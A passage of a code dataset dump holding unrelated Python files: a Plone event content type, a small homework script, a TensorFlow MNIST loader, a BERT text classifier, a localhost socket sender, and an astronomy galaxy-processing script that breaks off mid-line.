name='start_time',\n widget=atapi.CalendarWidget(\n label='Startdate',\n label_msgid='minaraad_label_startdate',\n i18n_domain='minaraad',\n ),\n required=1\n ),\n\n atapi.TextField(\n name='body',\n allowable_content_types=('text/html', 'text/plain'),\n widget=atapi.RichWidget(\n label='Body',\n label_msgid='minaraad_label_body',\n i18n_domain='minaraad',\n ),\n searchable=1,\n default_content_type='text/html',\n default_output_type='text/x-html-safe',\n ),\n\n atapi.BooleanField(\n name='subscriptionAllowed',\n default=True,\n widget=atapi.BooleanWidget(\n label='Subscription allowed',\n label_msgid='minaraad_label_subscription_allowed',\n description=(\n 'By default, subscription is allowed till one day before '\n 'start of the event. Uncheck this field to disallow '\n 'subscription immediately.'),\n description_msgid='minaraad_description_subscription_allowed',\n i18n_domain='minaraad',\n ),\n ),\n\n ImageField(\n name='foto',\n widget=atapi.ImageWidget(\n label=\"Photo\",\n label_msgid='minaraad_label_foto',\n i18n_domain='minaraad',\n visible=False\n ),\n storage=atapi.AttributeStorage(),\n sizes={'foto': (300, 300)}\n ),\n\n OrderableReferenceField(\n name='contact',\n vocabulary_display_path_bound=\"-1\",\n widget=OrderableReferenceWidget(\n visible=False,\n label='Contact',\n label_msgid='minaraad_label_contact',\n i18n_domain='minaraad',\n base_query={\n 'sort_on': 'sortable_title',\n },\n ),\n allowed_types=('ContactPerson', ),\n multiValued=1,\n relationship='mrevent_contact'\n ),\n\n atapi.ReferenceField(\n name='relatedDocuments',\n vocabulary_display_path_bound=\"-1\",\n widget=ReferenceBrowserWidget(\n label='Related Documents',\n label_msgid='minaraad_label_related_documents',\n description=\"Related and published digibib documents and files\",\n description_msgid=\"minaraad_help_related_documents\",\n i18n_domain='minaraad',\n # ATReferenceBrowser specific additions:\n startup_directory='/',\n restrict_browsing_to_startup_directory=0,\n only_for_review_states=('published', ),\n show_review_state=1,\n allow_search=1,\n allow_browse=1,\n show_indexes=0,\n force_close_on_insert=0,\n ),\n allowed_types=('Document', 'File', 'FileAttachment',\n 'Advisory', 'Study', 'MREvent'),\n multiValued=True,\n relationship='related_documents'\n ),\n\n),\n)\n\nMREvent_schema = atapi.OrderedBaseFolderSchema.copy() + \\\n schema.copy() + \\\n ImageAttachmentsmixin.schema.copy() + \\\n contacts_schema.copy()\n\nMREvent_schema.moveField('coordinator', after=\"subscriptionAllowed\")\nMREvent_schema.moveField('authors', after=\"coordinator\")\n\n\nclass MREvent(Attachmentsmixin, BaseMeeting, ThemeParentMixin):\n \"\"\"\n \"\"\"\n implements(IMREvent, IUseContact)\n security = ClassSecurityInfo()\n archetype_name = 'MREvent'\n portal_type = 'MREvent'\n _at_rename_after_creation = True\n schema = MREvent_schema\n\n def getRelatedDocuments(self):\n \"\"\"Get the documents from the relatedDocuments field.\n\n Only get those that the user is allowed to access.\n\n Adapted from\n Products/CMFPlone/skins/plone_scripts/computeRelatedItems.py\n \"\"\"\n docs = self.getField('relatedDocuments').get(self)\n return list_viewable(docs)\n\natapi.registerType(MREvent, PROJECTNAME)\n","sub_path":"src/Products.minaraad/Products/minaraad/content/MREvent.py","file_name":"MREvent.py","file_ext":"py","file_size_in_byte":5938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"519344209","text":"from functools import reduce\r\n\r\ndef sayılar(sayı,sayı1):\r\n a=list(range(sayı,sayı1))\r\n\r\n print(list( map(lambda x : x*2, filter(lambda x : x%2!=0,a)))) #tek sayılar ikiyle çarptık)\r\n print(reduce(lambda x,y : x+y , a)) #listedeki sayıları topladık\r\nsayı =int(input(\"bir sayı giriniz:\"))\r\nsayı1 =int(input(\"bir sayı giriniz:\"))\r\nsayılar(sayı,sayı1)\r\n","sub_path":"2.ödev tekleri ikiyle çarp.py","file_name":"2.ödev tekleri ikiyle çarp.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"26647645","text":"# The MIT License (MIT)\n# Copyright (c) 2019 Ian Buttimer\n\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\nfrom .csv_pipelines import (\n execute_csv_to_postgres_pipeline,\n execute_csv_currency_to_postgres_pipeline\n)\nfrom .plot_pipelines import (\n execute_postgres_to_plot_pipeline,\n execute_file_ip_postgres_to_plot_pipeline,\n execute_file_ip_sql_to_plot_pipeline,\n)\nfrom .create_pipelines import (\n execute_create_sales_data_postgres_pipeline,\n execute_create_currency_data_postgres_pipeline,\n)\nfrom .clean_pipelines import (\n execute_clean_sales_data_postgres_pipeline,\n execute_clean_currency_data_postgres_pipeline\n)\nfrom .currency_pipelines import execute_currency_to_postgres_pipeline\n\n# if somebody does \"from sales_journal.pipelines import *\", this is what they will\n# be able to access:\n__all__ = [\n 'execute_csv_to_postgres_pipeline',\n 'execute_csv_currency_to_postgres_pipeline',\n\n 'execute_postgres_to_plot_pipeline',\n 'execute_file_ip_postgres_to_plot_pipeline',\n 'execute_file_ip_sql_to_plot_pipeline',\n\n 'execute_create_sales_data_postgres_pipeline',\n 'execute_create_currency_data_postgres_pipeline',\n\n 'execute_clean_sales_data_postgres_pipeline',\n 'execute_clean_currency_data_postgres_pipeline',\n\n 'execute_currency_to_postgres_pipeline',\n]\n","sub_path":"sales_journal/pipelines/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"422516053","text":"#\n# Copyright 2017 Google Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nr\"\"\"Provides data for the mnist with attributes dataset.\n\nProvide data loading utilities for an augmented version of the\nMNIST dataset which contains the following attributes:\n 1. Location (digits are translated on a canvas and placed around\n one of four locations/regions in the canvas). Each location\n is a gaussian placed at four quadrants of the canvas.\n 2. Scale (We vary scale from 0.4 to 1.0), with two gaussians\n placed at 0.5 +- 0.1 and 0.9 +- 0.1 repsectively.\n 3. Orientation: we vary orientation from -90 to +90 degrees,\n sampling actual values from gaussians at +30 +- 10 and\n -30 +-10. On a third of the occasions we dont orient the\n digit at all which means a rotation of 0 degrees.\n\nThe original data after transformations is binarized as per the\nprocedure described in the following paper:\n\n Salakhutdinov, Ruslan, and Iain Murray. 2008. ``On the Quantitative Analysis of\n Deep Belief Networks.'' In Proceedings of the 25th International Conference on\nAuthor: vrama@\n\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\n\nimport tensorflow as tf\n\nfrom tensorflow.contrib.slim.python.slim.data import dataset\nfrom tensorflow.contrib.slim.python.slim.data import tfexample_decoder\n\n# Only provides option to load the binarized version of the dataset.\n_FILE_PATTERN = 'binarized_True_replication_1_retrieval_at_1.tf_record'\n\n# TODO(vrama): Update\n_DATASET_DIR = (\n '${PWD}/data/mnist_with_attributes/'\n)\n\n_SPLIT_TYPE = 'retrieval'\n\n_SPLITS_TO_SIZES = {'retrieval': 70000}\n\n_ITEMS_TO_DESCRIPTIONS = {\n 'image': 'A [64 x 64 x 1] grayscale image.',\n 'labels': 'Labels induced on latent states used to generate the image.',\n 'latents': 'Latents used to generate the image.'\n}\n\n# There are four labels in the dataset corresponding to\n# shape, size, orientation, and location of the object.\n# 10 classes for digits (0-9),\n# 2 classes for size (big, small)\n# 3 classes for orientation (clockwise, center, counterclockwise)\n# 4 classes for location (top-left, top-right, bottom-left, bottom-right)\n_NUM_CLASSES_PER_ATTRIBUTE = (10, 2, 3, 4)\n\n_NUM_LATENTS = 5\n\n\ndef get_split(split_name='retrieval',\n dataset_dir=None,\n num_classes_per_attribute=None):\n \"\"\"Gets a dataset tuple with instructions for reading 2D shapes data.\n\n Args:\n split_name: A train/test split name.\n dataset_dir: The base directory of the dataset sources.\n num_classes_per_attribute: The number of labels for the classfication\n problem corresponding to each attribute. For example, if the first\n attribute is \"shape\" and there are three possible shapes, then\n then provide a value 3 in the first index, and so on.\n\n Returns:\n A `Dataset` namedtuple.\n metadata: A dictionary with some metadata about the dataset we just\n constructed.\n\n Raises:\n ValueError: if `split_name` is not a valid train/test split.\n \"\"\"\n if split_name not in _SPLITS_TO_SIZES:\n raise ValueError('split name %s was not recognized.' % split_name)\n\n if num_classes_per_attribute is None:\n num_classes_per_attribute = _NUM_CLASSES_PER_ATTRIBUTE\n\n if dataset_dir is None:\n dataset_dir = _DATASET_DIR\n\n file_pattern = os.path.join(dataset_dir, _FILE_PATTERN)\n\n keys_to_features = {\n 'image/encoded': tf.FixedLenFeature((), tf.string, default_value=''),\n 'image/format': tf.FixedLenFeature((), tf.string, default_value='raw'),\n 'labels': tf.FixedLenFeature([len(num_classes_per_attribute)], tf.int64),\n 'latents': tf.FixedLenFeature([_NUM_LATENTS], tf.float32),\n }\n\n items_to_handlers = {\n 'image': tfexample_decoder.Image(shape=[64, 64, 3]),\n 'labels': tfexample_decoder.Tensor('labels'),\n 'latents': tfexample_decoder.Tensor('latents'),\n }\n\n decoder = tfexample_decoder.TFExampleDecoder(keys_to_features,\n items_to_handlers)\n\n metadata = {\n 'num_classes_per_attribute': num_classes_per_attribute,\n 'split_type': _SPLIT_TYPE\n }\n\n return dataset.Dataset(\n data_sources=file_pattern,\n reader=tf.TFRecordReader,\n decoder=decoder,\n num_samples=_SPLITS_TO_SIZES[split_name],\n items_to_descriptions=_ITEMS_TO_DESCRIPTIONS), metadata\n","sub_path":"datasets/mnist_attributes/affine_mnist_retrieval_set.py","file_name":"affine_mnist_retrieval_set.py","file_ext":"py","file_size_in_byte":4861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"98872309","text":"# import tensorflow as tf\n# import numpy as np\n# from tf_utils.bert_modeling import BertModel, BertConfig, get_assignment_map_from_checkpoint, get_shape_list # BERT\n\n# # from tf_utils.eltra_modeling import BertModel, BertConfig, get_assignment_map_from_checkpoint, get_shape_list # Electra\n# # from tf_utils.modeling import BertModel, BertConfig, get_assignment_map_from_checkpoint, get_shape_list # ALBERT\n# from tensorflow.contrib.layers.python.layers import initializers\n# from tf_utils.crf_utils import rnncell as rnn\nfrom config import Config\nconfig = Config()\nimport tensorflow as tf\nimport numpy as np\n# from tf_utils.bert_modeling import BertModel, BertConfig, get_assignment_map_from_checkpoint, get_shape_list # BERT\nif config.pretrain_model == 'albert':\n from tf_utils.modeling import BertModel, BertConfig, get_assignment_map_from_checkpoint, get_shape_list # ALBERT\nelif config.pretrain_model =='nezha':\n from tf_utils.nezha import BertModel, BertConfig, get_assignment_map_from_checkpoint, get_shape_list # Nezha\n # from tf_utils.modeling import BertModel, BertConfig, get_assignment_map_from_checkpoint, get_shape_list # ALBERT\nelse:\n from tf_utils.bert_modeling import BertModel, BertConfig, get_assignment_map_from_checkpoint, get_shape_list # BERT\nfrom tensorflow.contrib.crf import crf_log_likelihood, viterbi_decode\nfrom tensorflow.contrib.layers.python.layers import initializers\nfrom tf_utils.crf_utils import rnncell as rnn\nfrom tf_utils.bert_modeling import layer_norm\nfrom focal_loss import focal_loss\n\n# import memory_saving_gradients\n# tf.__dict__[\"gradients\"] = memory_saving_gradients.gradients_memory\n# # 对于CRF这种多优化目标的层,memory_saving_gradients会出bug,注释即可。\n\n\n\nclass Model:\n\n def __init__(self, config):\n self.config = config\n self.input_x_word = tf.placeholder(tf.int32, [None, None], name=\"input_x_word\")\n self.input_x_len = tf.placeholder(tf.int32, name='input_x_len')\n self.input_mask = tf.placeholder(tf.int32, [None, None], name='input_mask')\n self.label = tf.placeholder(tf.int32, [None], name='label') # 情感标签\n self.segment_ids = tf.placeholder(tf.int32, [None, None], name='segment_ids') # 分段标签\n self.keep_prob = tf.placeholder(tf.float32, name='dropout_keep_prob')\n self.is_training = tf.placeholder(tf.bool, None, name='is_training')\n\n self.relation_num = config.relation_num\n self.initializer = initializers.xavier_initializer()\n\n self.init_embedding(bert_init=True)\n output_layer = self.word_embedding\n gru_num=int(self.config.embed_dense_dim/2)\n hidden_size = get_shape_list(output_layer)[-1]\n if config.addcnn:\n ##bert后接text CNN\n num_filters = config.num_filters\n kernel_size = config.kernel_size # 卷积核尺寸\n output_layer = tf.layers.conv1d(output_layer, num_filters, kernel_size) #[batch,(seq_length - kernel_size + 1),num_filters]\n hidden_size = num_filters\n pool_size = config.sequence_length - kernel_size + 1\n # 每个卷积核得到一个(seq_length - kernel_size + 1)size的向量\n elif config.addgru:\n GRU_cell_fw = tf.contrib.rnn.GRUCell(gru_num,name='fw_tr') # 参数可调试\n # 后向\n GRU_cell_bw = tf.contrib.rnn.GRUCell(gru_num,name='bw_tr') # 参数可调试\n output_layer_1 = tf.nn.bidirectional_dynamic_rnn(cell_fw=GRU_cell_fw,\n cell_bw=GRU_cell_bw,\n inputs=output_layer,\n sequence_length=None,\n dtype=tf.float32)[0]\n output_layer_1=tf.concat([output_layer_1[0],output_layer_1[1]],axis=-1)\n # GRU_cell_fw_1 = tf.contrib.rnn.GRUCell(gru_num, name='fw_tr',reuse=True) # 参数可调试\n # # 后向\n # GRU_cell_bw_1 = tf.contrib.rnn.GRUCell(gru_num, name='fw_tr',reuse=True) # 参数可调试\n # output_layer_2 = tf.nn.bidirectional_dynamic_rnn(cell_fw=GRU_cell_fw_1,\n # cell_bw=GRU_cell_bw_1,\n # inputs=output_layer_1,\n # sequence_length=None,\n # dtype=tf.float32)[0]\n # output_layer_2 = tf.concat([output_layer_2[0], output_layer_2[1]], axis=-1)\n # # output_layer_3 = tf.nn.bidirectional_dynamic_rnn(cell_fw=GRU_cell_fw,\n # # cell_bw=GRU_cell_bw,\n # # inputs=output_layer_2,\n # # sequence_length=None,\n # # dtype=tf.float32)[0]\n # # output_layer_3 = tf.concat([output_layer_3[0], output_layer_3[1]], axis=-1)\n # output_layer = tf.concat([output_layer_1,output_layer_2],axis=-1)\n output_layer =output_layer_1\n pool_size = config.sequence_length\n hidden_size = output_layer.shape[-1]\n # elif config.addbilstm== True:\n # # some hyper_parameters\n # used = tf.sign(tf.abs(self.input_x_word))\n # length = tf.reduce_sum(used, reduction_indices=1)\n # self.lengths = tf.cast(length, tf.int32)\n # self.batch_size = tf.shape(self.input_x_word)[0]\n # self.num_steps = tf.shape(self.input_x_word)[-1]\n # # lstm_inputs = tf.nn.dropout(output_layer, config.dropout)\n # # bi-directional lstm layer\n # lstm_cell = {}\n # for direction in [\"forward\", \"backward\"]:\n # with tf.name_scope(direction):\n # lstm_cell[direction] = rnn.CoupledInputForgetGateLSTMCell(\n # 256,\n # use_peepholes=True,\n # initializer=self.initializer,\n # state_is_tuple=True)\n # outputs= tf.nn.bidirectional_dynamic_rnn(lstm_cell[\"forward\" ],lstm_cell[\"backward\"],output_layer,dtype=tf.float32,sequence_length=self.lengths)[0]\n # model_outputs_1=tf.concat(outputs, axis=2)\n # outputs= tf.nn.bidirectional_dynamic_rnn(lstm_cell[\"forward\" ],lstm_cell[\"backward\"],model_outputs_1,dtype=tf.float32,sequence_length=self.lengths)[0]\n # model_outputs_2=tf.concat(outputs, axis=2)\n # outputs= tf.nn.bidirectional_dynamic_rnn(lstm_cell[\"forward\" ],lstm_cell[\"backward\"],model_outputs_2,dtype=tf.float32,sequence_length=self.lengths)[0]\n # model_outputs_3 = tf.concat(outputs, axis=2)\n # output_layer=tf.concat([ model_outputs_1, model_outputs_2, model_outputs_3], axis=-1)\n # pool_size = self.config.sequence_length\n # hidden_size = output_layer.shape[-1]\n else:\n pool_size=config.sequence_length\n\n # 池化+drop_out\n if self.config.is_avg_pool:\n if config.pool=='mean':\n avpooled_out = tf.layers.average_pooling1d(output_layer, pool_size=pool_size, strides=1) # shape = [batch, num_filters]\n elif config.pool=='join':\n avpooled_out = tf.layers.average_pooling1d(output_layer, pool_size=pool_size, strides=1) # shape = [batch, num_filters]\n maxpooled_out = tf.layers.max_pooling1d(output_layer, pool_size=config.sequence_length, strides=1)\n avpooled_out = tf.concat([avpooled_out,maxpooled_out],axis=-1)\n hidden_size = 2*hidden_size\n else:\n avpooled_out = tf.layers.max_pooling1d(output_layer,pool_size=config.sequence_length,strides=1)\n avpooled_out = tf.reshape(avpooled_out, [-1, hidden_size])\n else:\n avpooled_out = output_layer[:, 0:1, :] # pooled_output\n avpooled_out = tf.squeeze(avpooled_out, axis=1)\n\n\n def logits_and_predict(num_classes, name_scope=None):\n with tf.name_scope(name_scope):\n inputs = tf.nn.dropout(avpooled_out, keep_prob=config.keep_prob)\n # inputs=avpooled_out\n logits = tf.layers.dense(inputs, num_classes,\n kernel_initializer=tf.truncated_normal_initializer(stddev=0.01),\n name='logits')\n predict = tf.round(tf.sigmoid(logits), name=\"predict\")\n return logits, predict\n\n self.logits, self.predict = logits_and_predict(self.relation_num, name_scope='relation')\n # print(self.logits)\n self.one_hot_labels = tf.one_hot(self.label, depth=self.relation_num, dtype=tf.float32, name=\"one_hot_label\")\n if config.loss=='focal_loss':\n self.loss =focal_loss(self.one_hot_labels,self.logits,[16902,25392,57619])\n else:\n losses = tf.nn.sigmoid_cross_entropy_with_logits(labels=self.one_hot_labels, logits=self.logits, name='losses')\n self.loss = tf.reduce_mean(tf.reduce_sum(losses, axis=1), name='loss')\n\n\n def init_embedding(self, bert_init=True):\n with tf.name_scope('embedding'):\n word_embedding = self.bert_embed(bert_init)\n print('self.config.embed_dense_dim:', self.config.embed_dense_dim)\n word_embedding = tf.layers.dense(word_embedding, self.config.embed_dense_dim, activation=tf.nn.relu)\n hidden_size = word_embedding.shape[-1].value\n self.word_embedding = word_embedding\n print(word_embedding.shape)\n self.output_layer_hidden_size = hidden_size\n\n def bert_embed(self, bert_init=True):\n bert_config_file = self.config.bert_config_file\n bert_config = BertConfig.from_json_file(bert_config_file)\n model = BertModel(\n config=bert_config,\n is_training=self.is_training, # 微调\n input_ids=self.input_x_word,\n input_mask=self.input_mask,\n token_type_ids=None,\n use_one_hot_embeddings=False)\n\n layer_logits = []\n for i, layer in enumerate(model.all_encoder_layers):\n layer_logits.append(\n tf.layers.dense(\n layer, 1,\n kernel_initializer=tf.truncated_normal_initializer(stddev=0.02),\n name=\"layer_logit%d\" % i\n )\n )#[batch_size]\n\n layer_logits = tf.concat(layer_logits, axis=2) # 第三维度拼接\n layer_dist = tf.nn.softmax(layer_logits)\n seq_out = tf.concat([tf.expand_dims(x, axis=2) for x in model.all_encoder_layers], axis=2)\n pooled_output = tf.matmul(tf.expand_dims(layer_dist, axis=2), seq_out)\n pooled_output = tf.squeeze(pooled_output, axis=2)\n pooled_layer = pooled_output\n\n char_bert_outputs = pooled_layer\n\n A_output =pooled_layer\n R_output = model.get_sequence_output()\n RoA = tf.multiply(R_output, A_output)\n R_A = tf.add(R_output, A_output)\n fill_output = tf.concat([R_output, A_output, RoA, R_A],\n axis=2) # 【batch_size,seq_len,hidden_size*4】后面会借一个enbed_dense_dim的全连接\n\n # \"\"\"Hire_bert\"\"\"\n\n def BidirectionalGRUEncoder(hidden_dim,inputs,name):\n # 双向GRU的编码层,将一句话中的所有单词或者一个文档中的所有句子向量进行编码得到一个 2×hidden_size的输出向量,然后在经过Attention层,将所有的单词或句子的输出向量加权得到一个最终的句子/文档向量。\n # 输入inputs的shape是[batch_size, max_len, hidden_size]\n #参数共享\n with tf.variable_scope(name_or_scope=name, reuse=tf.AUTO_REUSE):\n #\n #前向\n GRU_cell_fw = tf.contrib.rnn.GRUCell(hidden_dim) #参数��调试\n #后向\n GRU_cell_bw = tf.contrib.rnn.GRUCell(hidden_dim) #参数可调试\n ((fw_outputs, bw_outputs), (_, _)) = tf.nn.bidirectional_dynamic_rnn(cell_fw=GRU_cell_fw,\n cell_bw=GRU_cell_bw,\n inputs=inputs,\n sequence_length=None,\n dtype=tf.float32)\n outputs = tf.concat((fw_outputs, bw_outputs), 2)\n return outputs\n layer_logits = []\n # 得到每一层的alpha\n #共享参数\n\n for i, layer in enumerate(model.all_encoder_layers):\n ###Bigru是为了确定每一层的权重\n #两层双向GRU\n B_1 = BidirectionalGRUEncoder(self.config.gru_hidden_dim, layer,'bigru_1') # 结果是前向gru和后向gru\n B_2= BidirectionalGRUEncoder(self.config.gru_hidden_dim, B_1,'bigru2')\n #将四个方向的向量拼接到一起\n U_layer=tf.concat((B_1,B_2), 2)\n layer_logits.append(\n tf.layers.dense(\n U_layer, 1,\n kernel_initializer=tf.truncated_normal_initializer(stddev=0.02),\n name=\"addgrulayer_logit%d\" % i\n )\n )\n # 得到每一层的alpha\n layer_logits = tf.concat(layer_logits, axis=2) # 第三维度拼接\n layer_dist = tf.nn.softmax(layer_logits) #权重\n seq_out = tf.concat([tf.expand_dims(x, axis=2) for x in model.all_encoder_layers], axis=2)\n A_output = tf.matmul(tf.expand_dims(layer_dist, axis=2), seq_out)\n A_output = tf.squeeze(A_output, axis=2)#\n R_output=model.get_sequence_output()\n RoA=tf.multiply(R_output, A_output)\n R_A=tf.add(R_output,A_output)\n Mire_output=tf.concat([R_output,A_output,RoA,R_A],axis=2) #【batch_size,seq_len,hidden_size*4】后面会借一个enbed_dense_dim的全连接\n\n if self.config.use_origin_bert=='ori':\n final_hidden_states = model.get_sequence_output() # 原生bert\n self.config.embed_dense_dim = 768\n elif self.config.use_origin_bert=='hire':\n final_hidden_states = Mire_output # hirebert\n elif self.config.use_origin_bert=='dym':\n final_hidden_states = char_bert_outputs # 多层融合bert\n self.config.embed_dense_dim = 512\n elif self.config.use_origin_bert == 'fill_bert':\n final_hidden_states = fill_output # 多层融合bert+互补\n else:\n raise SyntaxError# print('输入的参数错误') config.use_origin_bert\n\n\n tvars = tf.trainable_variables()\n init_checkpoint = self.config.bert_file # './chinese_L-12_H-768_A-12/bert_model.ckpt'\n assignment_map, initialized_variable_names = get_assignment_map_from_checkpoint(tvars, init_checkpoint)\n if bert_init:\n tf.train.init_from_checkpoint(init_checkpoint, assignment_map)\n\n tf.logging.info(\"**** Trainable Variables ****\")\n for var in tvars:\n init_string = \"\"\n if var.name in initialized_variable_names:\n init_string = \", *INIT_FROM_CKPT*\"\n print(\" name = {}, shape = {}{}\".format(var.name, var.shape, init_string))\n print('init bert from checkpoint: {}'.format(init_checkpoint))\n return final_hidden_states\n","sub_path":"emoion/preprocess/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":15877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"203151040","text":"import socket\nfrom struct import pack\n\n\nHOST = '127.0.0.1'\nPORT = 65430\n\n\ndef send_to_socket(msg):\n while True:\n try:\n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n s.connect((HOST, PORT))\n s.sendall(msg)\n except ConnectionResetError:\n continue\n except ConnectionRefusedError:\n continue\n break\n \n \ndef send_data(PACKING, *args): \n msg = pack(PACKING, *args)\n send_to_socket(msg)\n \n \nif __name__=='__main__':\n send_data('?ifi', True, 3, 0, 0)\n ","sub_path":"src/socket_messaging.py","file_name":"socket_messaging.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"445206518","text":"import pandas as pd\nfrom astropy.io import fits\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport photutils\nfrom photutils import segmentation as seg\nimport scipy.ndimage as ndi\nimport statmorph\nfrom astropy.visualization import (AsinhStretch, LogStretch, ImageNormalize)\nimport sys\nfrom astropy import wcs\nimport urllib.request\nfrom urllib.error import HTTPError, URLError\nimport multiprocessing as mp\nimport os\nfrom os import path\nimport time\nimport statistics\nfrom matplotlib import gridspec\nimport math\n\n\n# Delete the temporary galaxy files\ndef clearTempFiles(galaxy):\n if path.isfile(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G.fits'):\n os.system(f'rm /mnt/scratch/temp_galaxy_storage/{galaxy}_G.fits') \n if path.isfile(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G_iso_model.fits'):\n os.system(f'rm /mnt/scratch/temp_galaxy_storage/{galaxy}_G_iso_model.fits')\n if path.isfile(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G_galfit_model.fits'):\n os.system(f'rm /mnt/scratch/temp_galaxy_storage/{galaxy}_G_galfit_model.fits') \n if path.isfile(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G_mask.fits'):\n os.system(f'rm /mnt/scratch/temp_galaxy_storage/{galaxy}_G_mask.fits')\n if path.isfile(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G_psf.fits'):\n os.system(f'rm /mnt/scratch/temp_galaxy_storage/{galaxy}_G_psf.fits')\n if path.isfile(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G_sig.fits'):\n os.system(f'rm /mnt/scratch/temp_galaxy_storage/{galaxy}_G_sig.fits')\n if path.isfile(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G_iso_residual.fits'):\n os.system(f'rm /mnt/scratch/temp_galaxy_storage/{galaxy}_G_iso_residual.fits')\n if path.isfile(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G_galfit_residual.fits'):\n os.system(f'rm /mnt/scratch/temp_galaxy_storage/{galaxy}_G_galfit_residual.fits')\n\n\n# Check if any galaxy files downloaded are 0 MB\ndef checkCorrupt(galaxy):\n if path.isfile(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G.fits'):\n if(os.path.getsize(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G.fits') == 0):\n return True;\n if path.isfile(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G_iso_model.fits'):\n if(os.path.getsize(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G_iso_model.fits') == 0):\n return True;\n if path.isfile(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G_galfit_model.fits'):\n if(os.path.getsize(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G_galfit_model.fits') == 0):\n return True;\n if path.isfile(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G_mask.fits'):\n if(os.path.getsize(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G_mask.fits') == 0):\n return True;\n if path.isfile(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G_psf.fits'):\n if(os.path.getsize(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G_psf.fits') == 0):\n return True;\n if path.isfile(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G_sig.fits'):\n if(os.path.getsize(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G_sig.fits') == 0):\n return True;\n if path.isfile(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G_iso_residual.fits'):\n if(os.path.getsize(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G_iso_residual.fits') == 0):\n return True;\n if path.isfile(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G_galfit_residual.fits'):\n if(os.path.getsize(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G_galfit_residual.fits') == 0):\n return True;\n return False;\n\n \n# Determine if pixel [i,j] is within ellipse area\ndef inEllipse(i,j,xCenter,yCenter,size,ratio,angle):\n\n # Size is effective radius of galaxy which is then multiplied by a number to increase size of ellipse\n if (size > 160):\n size = 10*size\n else: \n size = 4*size\n\n x = (i-xCenter)\n y = (j-yCenter)\n a = math.sqrt((size**2)/ratio)\n b = (size**2)/a\n\n if( (((((x*math.cos(math.radians(angle))) - (y*math.sin(math.radians(angle))))**2) / (a**2)) + ((((y*math.cos(math.radians(angle))) + (x*math.sin(math.radians(angle))))**2) / (b**2))) <= 1):\n return True\n\n\ndef statmorphWrapper(index_pairs):\n \n df = pd.read_csv('NGVSgalaxies.csv')\n\n # Iterate through rows in csv file containing measurements for each galaxy\n for row in df.iloc[index_pairs[0]:index_pairs[1]].itertuples(index=True, name='Pandas'):\n galaxy = row.Official_name\n base = 'https://www.cadc-ccda.hia-iha.nrc-cnrc.gc.ca/files/vault/ngvs/data/NGVS/galaxies/'\n galaxyPath = f'{galaxy}/{galaxy}_G'\n\n # Create check file for current galaxy\n print(f'checking {galaxy}')\n writeFile = open(f'/mnt/scratch/check/{galaxy}.txt', 'w') \n writeFile.write('checking')\n writeFile.close()\n\n\n startcopy = time.time()\n # Try to copy galaxy files\n os.system(f'vcp vos:ngvs/data/NGVS/galaxies/{galaxy}/{galaxy}_G.fits /mnt/scratch/temp_galaxy_storage')\n os.system(f'vcp vos:ngvs/data/NGVS/galaxies/{galaxyPath}_iso_model.fits 